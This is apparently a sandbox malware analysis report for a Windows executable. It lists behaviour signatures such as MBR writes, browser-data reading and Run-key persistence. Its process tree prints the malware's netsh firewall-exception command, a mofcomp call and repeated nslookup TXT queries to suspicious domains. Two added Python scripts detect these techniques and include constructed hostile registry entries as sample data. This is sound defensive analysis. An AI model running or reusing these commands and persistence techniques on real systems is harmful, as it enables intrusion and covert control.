Analysis

  • max time kernel
    152s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11/10/2022, 07:45

General

  • Target

    55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe

  • Size

    2.3MB

  • MD5

    692213b2c7610cdb5656fb1f138e181e

  • SHA1

    1581c44c08e239417d1904a4b706fa2a7a742f71

  • SHA256

    55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b

  • SHA512

    55705633ef5c769b0618dc20f2d716535846e00d71ea7f727f079969353410561a4b85f6f5eca0be8a36eeb02b71a931c56fcd1d0c4b64658ad69912f417d9ff

  • SSDEEP

    49152:OBrlCNnO0x9qk4QLH2mUrQOyH6A1retpOls:OBBoOa9UKWm0262y

Malware Config

Signatures

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Blocks application from running via registry modification 18 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 5 IoCs
  • Sets file execution options in registry 2 TTPs 64 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 36 IoCs

    Traffic on the DNS port was sent to servers other than the DNS servers configured on the host.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
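The three registry signatures above (blocking applications via DisallowRun, setting file execution options, adding a Run key) are easiest to confirm offline on a `.reg` export of the relevant hives. The parser and checks below are an added example, not code from the sandbox or from this sample; `SAMPLE_REG` is constructed for the example, and the blocked program names, the IFEO target `procexp.exe`, the debugger path and the Run value name `Updater` are placeholders rather than IoCs from this report. The key paths for the Explorer `DisallowRun` policy, `Image File Execution Options` and the `Run` keys are the standard Windows locations.

```python
"""Offline check of a .reg export for the three registry techniques in the
signature list: DisallowRun policy entries, Image File Execution Options (IFEO)
Debugger values, and Run-key autostarts pointing into a user's Temp directory.
SAMPLE_REG is constructed; its names and paths are placeholders, not IoCs."""
import re

EXPLORER_POLICY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
RUN_KEYS = (
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
)
USER_TEMP_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"DisallowRun"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun]
"1"="wireshark.exe"
"2"="fiddler.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]
"Debugger"="C:\\Windows\\System32\\svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Users\\Admin\\AppData\\Local\\Temp\\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _decode(raw):
    """Decode the common .reg value encodings; anything else is kept verbatim."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    return raw


def parse_reg(text):
    """Return {key_path: {value_name: value}} from a Regedit 5.00 export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else m.group(1)[1:-1]
            keys[current][name] = _decode(m.group(2))
    return keys


def _get(values, name):
    """Registry value names are case-insensitive."""
    return next((v for n, v in values.items() if n.lower() == name.lower()), None)


def find_issues(keys):
    """Return sorted (technique, subject, detail) tuples for the parsed export."""
    issues = []
    lk = {k.lower(): v for k, v in keys.items()}  # key paths are case-insensitive too
    if _get(lk.get(EXPLORER_POLICY.lower(), {}), "DisallowRun") == 1:
        blocked = lk.get(EXPLORER_POLICY.lower() + r"\disallowrun", {})
        for _, exe in sorted(blocked.items()):
            issues.append(("disallowrun", str(exe), "blocked by Explorer policy"))
    prefix = IFEO.lower() + "\\"
    for k, vals in lk.items():
        debugger = _get(vals, "Debugger") if k.startswith(prefix) else None
        # GlobalFlag alone is an ordinary debugging setting; a Debugger value
        # redirects every launch of the target to another binary (the hijack).
        if debugger is not None:
            issues.append(("ifeo_debugger", k[len(prefix):], str(debugger)))
    for run in RUN_KEYS:
        for name, cmd in lk.get(run.lower(), {}).items():
            if USER_TEMP_RE.match(str(cmd).strip('"')):
                issues.append(("run_key_from_temp", name, str(cmd)))
    return sorted(issues)


if __name__ == "__main__":
    for issue in find_issues(parse_reg(SAMPLE_REG)):
        print(*issue, sep="  ")
```

Export the live hives with `reg export HKCU\Software\Microsoft\Windows\CurrentVersion out.reg` (and the HKLM `Windows NT` branch for IFEO) and feed the file to `parse_reg`. The `notepad.exe` entry with only `GlobalFlag` is deliberately left unflagged: IFEO keys are also used legitimately, and it is the `Debugger` value that redirects execution.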

Processes

  • C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe
    "C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4344
    • C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe
      "C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe" "C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe"
      2⤵
      • Enumerates VirtualBox registry keys
      • Blocks application from running via registry modification
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Adds Run key to start application
      • Checks for any installed AV software in registry
      • Enumerates connected drives
      • Writes to the Master Boot Record (MBR)
      • Modifies Internet Explorer settings
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4208
      • C:\Windows\SysWOW64\Wbem\mofcomp.exe
        mofcomp "C:\Users\Admin\AppData\Local\Temp\5371.mof"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2088
      • C:\Windows\SysWOW64\netsh.exe
        netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe" "System Smart Security" ENABLE
        3⤵
        PID:2060
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt jj153svdksafjnqv.com 8.8.8.8
        3⤵
        PID:3752
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt jj153svdksafjnqv.net 8.8.8.8
        3⤵
        PID:220
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt jj153svdksafjnqv.com 208.67.222.222
        3⤵
        PID:3540
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt jj153svdksafjnqv.net 208.67.222.222
        3⤵
        PID:4908
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt jj153svdksafjnqv.com 8.8.4.4
        3⤵
        PID:4360
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt jj153svdksafjnqv.net 8.8.4.4
        3⤵
        PID:436
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt jj153svdksafjnqv.com 208.67.220.220
        3⤵
        PID:3964
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt jj153svdksafjnqv.net 208.67.220.220
        3⤵
        PID:5116
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt eejllo680ooxggl.com 8.8.8.8
        3⤵
        PID:1584
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt eejllo680ooxggl.net 8.8.8.8
        3⤵
        PID:2320
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt eejllo680ooxggl.com 208.67.222.222
        3⤵
        PID:2660
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt eejllo680ooxggl.net 208.67.222.222
        3⤵
        PID:3344
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt eejllo680ooxggl.com 8.8.4.4
        3⤵
        PID:3188
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt eejllo680ooxggl.net 8.8.4.4
        3⤵
        PID:4852
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt eejllo680ooxggl.com 208.67.220.220
        3⤵
        PID:3404
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt eejllo680ooxggl.net 208.67.220.220
        3⤵
        PID:4516
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt joqzeltvzhm1615r.com 8.8.8.8
        3⤵
        PID:1332
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt joqzeltvzhm1615r.net 8.8.8.8
        3⤵
        PID:3976
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt joqzeltvzhm1615r.com 208.67.222.222
        3⤵
        PID:528
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt joqzeltvzhm1615r.net 208.67.222.222
        3⤵
        PID:5004
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt joqzeltvzhm1615r.com 8.8.4.4
        3⤵
        PID:3532
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt joqzeltvzhm1615r.net 8.8.4.4
        3⤵
        PID:1424
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt joqzeltvzhm1615r.com 208.67.220.220
        3⤵
        PID:380
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup -q=txt joqzeltvzhm1615r.net 208.67.220.220
        3⤵
        PID:3092
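The child processes in the tree above are the part of this report that turns into detection logic most directly: 24 `nslookup -q=txt` runs that pin the resolver to 8.8.8.8, 8.8.4.4, 208.67.222.222 or 208.67.220.220 instead of the host's configured DNS server (which is what the "Unexpected DNS network traffic destination" signature fires on), a `netsh firewall add allowedprogram` exception for the dropped binary in the user's Temp directory, and `mofcomp` compiling a `.mof` file from Temp into the WMI repository. The Python below is an added example, not code from the sandbox or from this sample: it runs those three checks over Sysmon-style process-creation events. `CONFIGURED_DNS` is an assumed value and `SAMPLE_EVENTS` are constructed to mirror the tree (the PIDs 2088, 2060, 3752 and 1584 and their command lines match it; the two benign controls at the end are invented).

```python
"""Offline triage of process-creation events shaped like the tree above.
Flags nslookup TXT queries aimed at a resolver other than the configured one,
netsh firewall exceptions for binaries in a user's Temp directory, and mofcomp
runs that compile a .mof out of Temp. SAMPLE_EVENTS are constructed, not a log."""
import re

# Resolvers the host is configured to use (assumption for this example).
# Any other destination on the DNS port is what the sandbox signature
# "Unexpected DNS network traffic destination" describes.
CONFIGURED_DNS = {"10.0.0.1"}

USER_TEMP_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
TXT_OPTS = {"-q=txt", "-querytype=txt", "-type=txt"}  # nslookup spellings of a TXT query


def split_cmdline(cmdline):
    """Tokenise a Windows command line: whitespace separates, double quotes group."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def analyze(event):
    """Return [(rule, detail), ...] for one event with keys pid, image, cmdline."""
    findings = []
    image = event["image"].lower()
    argv = split_cmdline(event["cmdline"])
    if image.endswith("\\nslookup.exe"):
        # nslookup [-options] <name> [server]: a TXT query handed an explicit
        # server that is not the configured resolver is the pattern in the tree.
        opts = [a.lower() for a in argv[1:] if a.startswith("-")]
        positional = [a for a in argv[1:] if not a.startswith("-")]
        if TXT_OPTS & set(opts) and len(positional) == 2:
            name, server = positional
            if server not in CONFIGURED_DNS:
                findings.append(("dns_txt_to_unconfigured_resolver", f"{name} via {server}"))
    elif image.endswith("\\netsh.exe"):
        lowered = [a.lower() for a in argv]
        if "firewall" in lowered and "add" in lowered and "allowedprogram" in lowered:
            idx = lowered.index("allowedprogram")
            prog = argv[idx + 1] if idx + 1 < len(argv) else ""
            if USER_TEMP_RE.match(prog):
                findings.append(("firewall_exception_for_temp_binary", prog))
    elif image.endswith("\\mofcomp.exe"):
        # mofcomp compiles MOF into the WMI repository; a .mof sourced from a
        # user's Temp directory is worth pulling and reading.
        for arg in argv[1:]:
            if arg.lower().endswith(".mof") and USER_TEMP_RE.match(arg):
                findings.append(("mofcomp_from_user_temp", arg))
    return findings


def summarize(events):
    """Run analyze() over a batch and collect the distinct query names and
    resolvers from the TXT lookups, which is what you would block or hunt next."""
    report = {"findings": [], "dns_names": set(), "dns_servers": set()}
    for ev in events:
        for rule, detail in analyze(ev):
            report["findings"].append((ev["pid"], rule, detail))
            if rule == "dns_txt_to_unconfigured_resolver":
                name, server = detail.split(" via ")
                report["dns_names"].add(name)
                report["dns_servers"].add(server)
    return report


# Constructed events modelled on the process tree; the last two are benign
# controls (invented) that must not fire.
SAMPLE_EVENTS = [
    {"pid": 2088, "image": r"C:\Windows\SysWOW64\Wbem\mofcomp.exe",
     "cmdline": r'mofcomp "C:\Users\Admin\AppData\Local\Temp\5371.mof"'},
    {"pid": 2060, "image": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": r'netsh "firewall" add allowedprogram '
                r'"C:\Users\Admin\AppData\Local\Temp\55d1c26e13418119bfb2ea0d7f25b50e3e1799e21abe98408b3593d85c405a7b.exe" '
                r'"System Smart Security" ENABLE'},
    {"pid": 3752, "image": r"C:\Windows\SysWOW64\nslookup.exe",
     "cmdline": "nslookup -q=txt jj153svdksafjnqv.com 8.8.8.8"},
    {"pid": 1584, "image": r"C:\Windows\SysWOW64\nslookup.exe",
     "cmdline": "nslookup -q=txt eejllo680ooxggl.com 8.8.8.8"},
    {"pid": 9001, "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup -q=txt _dmarc.example.com 10.0.0.1"},
    {"pid": 9002, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh interface show interface"},
]

if __name__ == "__main__":
    for pid, rule, detail in summarize(SAMPLE_EVENTS)["findings"]:
        print(f"PID {pid}: {rule}: {detail}")
```

Feed real Sysmon event ID 1 records into `analyze` by mapping `Image` and `CommandLine` onto the `image` and `cmdline` keys. The resolver allow-list is the important knob: an explicit server argument to `nslookup` is legitimate for an administrator, so the check fires only when that server is not one the host is supposed to use, and the `dns_names` set from `summarize` is what you take to DNS logs and proxy logs afterwards.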

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Local\Temp\5371.mof

    Filesize

    340B

    MD5

    d37b493814e9f43c0d7a9461b2bf6315

    SHA1

    045d3cb6cbde9893d670d3c1742ccc1f6fff0387

    SHA256

    07acf96a1e3f0474c5d6a9e51dbf26967a0328186b382fdc9bbeb702527277ad

    SHA512

    fb4ca0ecf430ed14b401eb54ba01276c4d9592c51a2e4daa8490593f06c768ffa867107bf86f56a66400078239c98f5218c4c45bec2410b70216df9d8a82bc3f

  • memory/4208-137-0x0000000013140000-0x000000001372E000-memory.dmp

    Filesize

    5.9MB

  • memory/4208-133-0x0000000013140000-0x000000001372E000-memory.dmp

    Filesize

    5.9MB

  • memory/4208-135-0x0000000013140000-0x000000001372E000-memory.dmp

    Filesize

    5.9MB

  • memory/4208-144-0x0000000013140000-0x000000001372E000-memory.dmp

    Filesize

    5.9MB

  • memory/4208-136-0x0000000013140000-0x000000001372E000-memory.dmp

    Filesize

    5.9MB

  • memory/4208-138-0x0000000013140000-0x000000001372E000-memory.dmp

    Filesize

    5.9MB